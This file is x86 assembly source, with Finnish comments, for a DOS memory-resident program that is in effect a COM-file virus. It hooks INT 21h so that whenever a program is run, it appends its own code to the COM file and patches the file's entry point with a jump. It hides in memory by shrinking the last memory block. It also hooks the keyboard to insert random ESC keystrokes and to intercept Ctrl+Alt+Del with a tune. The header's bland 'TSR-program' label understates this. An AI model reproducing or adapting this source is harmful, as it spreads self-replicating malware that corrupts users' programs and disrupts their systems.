;ASM-source for TSR-program to save in file

        INCLUDE SE.ASM

CODE    SEGMENT BYTE PUBLIC

        extrn RandInt:NEAR

        public InstallProc

        ASSUME  CS:CODE,DS:nothing

TSRSize equ (offset TSREnd-offset TSRStart+10h)

TSRStart:

; Buffer for reading for installation program

JWSIGN:
ReadBuf dd ?
SenSize dw ?

; Variable for TSR to save SP
OldSP   dw ?

; Constant to use by Delay-routine
DelayCnt dw ?

; Buffer for writing for installation program
WriteBuf dw 0E990h
JMPLen  dw ?

SEG0040 dw 40h

; Buffer for bytes to replace in installation program
Bytes:  retf
        db ?,?,?

; Music to play when system goes down
Musa    dw 200, 75, 20
        dw 200, 75, 20
        dw 170, 75, 20
        dw 220, 75, 20
        dw 200, 150, 20
        dw 170, 150, 0
        dw 0
OldVideo db ?

NewI21: assume ds:nothing,es:nothing
        pushf
        cmp ax,0C603h
        jne Check1
        popf
        xor al, al
IRETWithCarry:push bp
        mov bp, sp
        or byte ptr ss:[bp+6], 1 ; Set carry flag
        pop bp
        iret
Check1: mov word ptr cs:[OldSP], sp
        cmp ah, 4Bh
        je CopyIt
ExitI21:mov sp, word ptr cs:[OldSP]
        popf
        db 0EAh
OldI21  dd ?

CallO21:pushf
        call dword ptr cs:[OldI21]
        retn

CopyIt: cmp al, 1
        ja ExitI21
        push ax
        push dx
        push cx
        push bx
        push bp
        push si
        push di
        push ds
        push es

        mov ax, 3D02h
        call CallO21
        jc Cannot

        mov bx, ax
        mov ah, 3Fh
        mov cx, 4
        push cs
        pop ds
        assume ds:CODE
        mov dx, offset ReadBuf
        call CallO21
        jc SuljeSe

        mov ax, word ptr [ReadBuf+2]
        mov word ptr ds:[Bytes+2], ax

        mov ax, word ptr [ReadBuf]
        mov word ptr ds:[Bytes], ax

        cmp ax, 4D5Ah
        je SuljeSe
        cmp ax, 5A4Dh
        je SuljeSe
        cmp ax, word ptr [WriteBuf]
        je SuljeSe

        mov ax, 4202h
        xor cx, cx
        mov dx, cx
        call CallO21
        jc SuljeSe

        mov word ptr [SenSize], ax
        mov ah, 40h
        mov cx, TSRSize
        mov dx, offset TSRStart
        call CallO21
        jc SuljeSe

        mov ax, 4200h
        xor cx, cx
        xor dx, dx
        call CallO21
        jc SuljeSe

        mov ax, word ptr [SenSize]
        add ax, offset Rutiini-offset TSRStart-3-1
        mov word ptr JMPLen, ax

        mov ah, 40h
        mov cx, 4
        mov dx, offset WriteBuf
        call CallO21

SuljeSe:mov ah, 3Eh
        call CallO21
        clc ;Jos tuossa tapahtui virhe, ollaan pulassa.

Cannot: pop es
        pop ds
        pop di
        pop si
        pop bp
        pop bx
        pop cx
        pop dx
        pop ax
        jmp ExitI21

NewI1C: assume ds:nothing,es:nothing
        db 0EAh
OldI1C  dd ?

NewI15: pushf
        jnc LopuInt
        cmp ah, 4Fh
        je MuutaSita
LopuInt:popf
        db 0EAh
OldI15  dd ?

MuutaSita:assume ds:nothing,es:nothing
        cmp al, 53h
        je DelNappi
        cmp al, 90h
        jb LopuInt
        cmp al, 99h
        jb LisaaJotain
        cmp al, 9Eh
        jb LopuInt
        cmp al, 0A6h
        jb LisaaJotain
        cmp al, 0ACh
        jb LopuInt
        cmp al, 0B2h
        jb LisaaJotain
        jmp short LopuInt
LisaaJotain:
        push ax
        mov ax, 1000
        push ax
        push cs
        call near ptr RandInt
        pop ax
        jnz LopuInt
        mov al, 1Bh
        jmp short LopuInt
DelNappi:push ax
        push es
        mov ax, 40h
        mov es, ax
        mov al, byte ptr es:[17h]
        test al, 8
        jz PopIt
        test al, 4
PopIt:  pop es
        pop ax
        jz LopuInt

        call SystemGoesDownNow

        popf
        jmp IRETWithCarry

InstallProc:
Rutiini:assume ds:nothing,es:nothing
        call near ptr Plc1
Plc1:   pop bp
        sub bp, 3 ; Now BP has offset of Rutiini
        push es
        pop ds

        clc
        mov ax, 0C603h
        int 21h
        jnc Install

        ;Ei voi mitn; joku vastaava ohjelma on jo muistissa.
        ;(Se voisi olla jopa Doodle-Virus,
        ; sekin kytt tuota lukua tarkistukseen.)

Puistu: jmp Paluu
Install:call CalibrateSpeed
        push es
        mov ax, 3521h
        int 21h
        mov word ptr OldI21, bx
        mov word ptr OldI21+2, es
        mov ax, 351Ch
        int 21h
        mov word ptr OldI1C, bx
        mov word ptr OldI1C+2, es
        mov ax, 3515h
        int 21h
        mov word ptr OldI15, bx
        mov word ptr OldI15+2, es
        pop es

        mov ax,ds       ;Get PSP selector
        dec ax          ;Get MCB selector
        mov ds,ax       ;Set MCB selector

        cmp byte ptr ds:[0], 'Z'
        jne Paluu

        mov bx, word ptr ds:[3]
        cmp bx, TSRSize/16
        jbe Puistu
        sub bx, TSRSize/16
        mov word ptr ds:[3], bx
        add ax, bx
        mov ds, ax
        assume ds:nothing,es:nothing
        mov byte ptr ds:[0], 'Z'
        mov word ptr ds:[1], 0
        mov word ptr ds:[3], TSRSize/16
        inc ax
        mov ds, ax
        push ds
        push es
        push ds
        pop es
        push cs
        pop ds
        assume ds:CODE,es:nothing
        lea si,[bp+offset TSRStart-offset Rutiini]
        xor di,di
        mov cx,TSRSize
        cld
        rep movsb
        pop es
        pop ds

        mov ax, 2521h
        mov dx, offset NewI21
        int 21h
        mov ax, 251Ch
        mov dx, offset NewI1C
        int 21h
        mov ax, 2515h
        mov dx, offset NewI15
        int 21h
        ;Nyt on installointi suoritettu

        ;Poistutaan ties mill mielell
Paluu:  push cs
        pop ds
        assume ds:CODE
        mov ax, word ptr ds:[bp+offset Bytes-offset Rutiini]
        mov ds:[100h], ax
        mov ax, word ptr ds:[bp+offset Bytes-offset Rutiini+2]
        mov ds:[102h], ax
        push es
        pop ds
        assume ds:nothing,es:nothing
        mov ax, 100h
        push ax
        retn

SystemGoesDownNow:
        push ax
        push bx
        push cx
        push dx
        push ds
        push cs
        pop ds
        assume ds:CODE,es:nothing
        push si
        mov si, offset Musa
        lodsw
MusLoop:push ax
        call Sound
        lodsw
        call Delay
        call NoSound
        lodsw
        call Delay
        lodsw
        or ax, ax
        jnz MusLoop
        pop si
        pop ds
        pop dx
        pop cx
        pop bx
        pop ax
        retn

Sound:  assume ds:nothing,es:nothing
        mov bx, sp
        mov bx, ss:[bx]
        MOV     AX,34DCH
        MOV     DX,0012H
        CMP     DX,BX
        JAE     @@2
        DIV     BX
        MOV     BX,AX
        IN      AL,61H
        TEST    AL,3
        JNZ     @@1
        OR      AL,3
        OUT     61H,AL
        MOV     AL,0B6H
        OUT     43H,AL
@@1:    MOV     AL,BL
        OUT     42H,AL
        MOV     AL,BH
        OUT     42H,AL
@@2:    retn 2

NoSound:assume ds:nothing,es:nothing
        IN      AL,61H
        AND     AL,0FCH
        OUT     61H,AL
        retn

CalibrateSpeed:
        assume ds:nothing,es:nothing
        push es
        MOV     es,word ptr cs:[bp+offset SEG0040-offset Rutiini]
        mov     di,6Ch
        MOV     BL,ES:[di]
@@3:    CMP     BL,ES:[di]
        JE      @@3
        MOV     BL,ES:[di]
        MOV     AX,-28
        CWD
        CALL    DelayLoop
        NOT     AX
        NOT     DX
        MOV     CX,55
        DIV     CX
        MOV     word ptr cs:[bp+offset DelayCnt-offset Rutiini],AX
        pop es
        retn

DelayLoop:
@@4:    SUB     AX,1
        SBB     DX,0
        JC      @@5
        CMP     BL,ES:[DI]
        JE      @@4
@@5:    RETn

Delay:  assume ds:nothing,es:nothing
        ;AX = milliseconds
        mov cx, ax
        push es
        push di
        JCXZ    @@7
        MOV     ES,SEG0040
        XOR     DI,DI
        MOV     BL,ES:[DI]
@@6:    MOV     AX,word ptr DelayCnt
        XOR     DX,DX
        CALL    DelayLoop
        LOOP    @@6
@@7:    pop di
        pop es
        RETn

TsrEnd:

CODE    ENDS

        END
